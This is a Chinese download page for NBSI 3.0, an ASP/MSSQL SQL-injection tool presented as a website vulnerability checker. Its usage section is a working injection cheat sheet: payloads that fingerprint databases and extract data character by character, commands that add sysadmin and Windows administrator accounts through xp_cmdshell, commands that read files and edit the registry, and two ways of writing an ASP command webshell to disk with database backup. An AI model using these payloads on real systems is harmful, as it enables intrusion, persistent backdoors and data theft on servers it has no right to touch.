当前位置: 首页 > 安全软件 > nbsi

nbsi

软件分类:免费软件 / 网络安全 版本:v3.0 官方版 大小:980KB 下载量:794 更新:2021-11-01 开发者:暂无认领 系统平台:WinAll, WinXP 软件官网:
官网评测
53
软件热度
4
官网评分
4
用户评分
nbsi图片
  • nbsi截图
nbsi介绍
软件标签: nbsisql

nbsi 3.0纯净版是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来劲途游戏网下载!

nbsi 3.0纯净版简介

本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在sql server注入检测方面有极高的准确率。

nbsi官方版使用说明

1.判断是否有注入

;and 1=1

;and 1=2

2.初步判断是否是mssql

;and user>0

3.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

4.注入参数是字符

'and [查询条件] and ''='

5.搜索时没过滤参数的

'and [查询条件] and '%25'='

6.猜数据库

;and (Select Count(*) from [数据库名])>0

7.猜字段

;and (Select Count(字段名) from 数据库名)>0

8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)

;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('serveRadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(SELECT IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell 'net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add'

;--

;exec master.dbo.xp_cmdshell 'net user username

password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup

administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not

in('上步得到的paths'))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'CommonFilesDir' 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('<% Dim oScript %>');

backup database model to disk='c:\l.asp';

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()='dbo' 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');

backup database model to disk='g:\wwwtest\l.asp';

请求的时候,像这样子用:

http://ip/l.asp?c=dir

解压密码:www.downcc.com

nbsi相关软件
  • nbsi

    软件标签: nbsisql nbsi 3.0纯净版是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来劲途游戏网下载!nbsi 3.0纯净版简介 本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗...

麻豆短视频传媒网站麻豆短视频传媒网站 叔叔不约匿名聊天网站叔叔不约匿名聊天网站 江西省政务支付统一平台网站登录 v4.2.1江西省政务支付统一平台网站登录 v4.2.1 左手影视网站左手影视网站 闲鱼网站二手市场闲鱼网站二手市场 deviantart网站deviantart网站 麻豆短视频传媒网站麻豆短视频传媒网站 泰剧迷网站泰剧迷网站 手机温度检测手机温度检测 家链医疗检测仪家链医疗检测仪 香宾检测香宾检测 摄像头扫描智能检测摄像头软件手机版下载 v1.0.0摄像头扫描智能检测摄像头软件手机版下载 v1.0.0 Battery Monitor(汽车电池电压检测App)Battery Monitor(汽车电池电压检测App) AI颜值检测评分AI颜值检测评分 Kiwi手指心率检测仪Kiwi手指心率检测仪 早检测论文查重系统早检测论文查重系统 掌上实用工具箱掌上实用工具箱 截图工具截图工具 阿花工具阿花工具 小新工具箱小新工具箱 ShanWan Gamepad激活工具ShanWan Gamepad激活工具 IM工具魔方计时器IM工具魔方计时器 忍3工具箱忍3工具箱 新比特工具新比特工具 SiteSafe(网站主动防挂马系统)SiteSafe(网站主动防挂马系统) Wappalyzer(Chrome网站分析插件)Wappalyzer(Chrome网站分析插件) WebZip(离线阅览网站)WebZip(离线阅览网站) urlpsy(网站监控软件)urlpsy(网站监控软件) 箫启灵网站腾讯认证生成器箫启灵网站腾讯认证生成器 网站商务通网站商务通 XPath2Doc(通用网站数据采集及Doc生成工具)XPath2Doc(通用网站数据采集及Doc生成工具) 维克网站建设管理系统维克网站建设管理系统 PhpScanning(PHP漏洞扫描器)PhpScanning(PHP漏洞扫描器) 超级Web漏洞扫描器超级Web漏洞扫描器 Netsparker(web应用漏洞扫描工具)Netsparker(web应用漏洞扫描工具) 360系统漏洞修复独立版360系统漏洞修复独立版 Metasploit(安全漏洞检测)Metasploit(安全漏洞检测) 瑞星系统安全漏洞扫描器瑞星系统安全漏洞扫描器 360高危漏洞免疫工具360高危漏洞免疫工具 网站漏洞检测工具网站漏洞检测工具 加密狗检测工具加密狗检测工具 3389密码安全检测器3389密码安全检测器 小汉堡防蹭网检测软件小汉堡防蹭网检测软件 原神可莉小助手防封过检测2021原神可莉小助手防封过检测2021 实况足球2013系统配置检测工具实况足球2013系统配置检测工具 Paperpass(论文检测软件)V5.1Paperpass(论文检测软件)V5.1 Lansweeper(网络设备检测工具)Lansweeper(网络设备检测工具) 狂龙网络检测工具狂龙网络检测工具 QtGif(秋天视频批量生成GIF工具)QtGif(秋天视频批量生成GIF工具) 剪映预览黑屏修复工具剪映预览黑屏修复工具 小叶视频转MP4工具小叶视频转MP4工具 Ghost文件工具Ghost文件工具 快解密码读取工具(Fastreader)快解密码读取工具(Fastreader) 晨枫U盘启动盘制作工具晨枫U盘启动盘制作工具 Clavier+(快捷键设置工具)Clavier+(快捷键设置工具) 道言文件信息修改工具道言文件信息修改工具
nbsi相关资讯
nbsi软件评分
4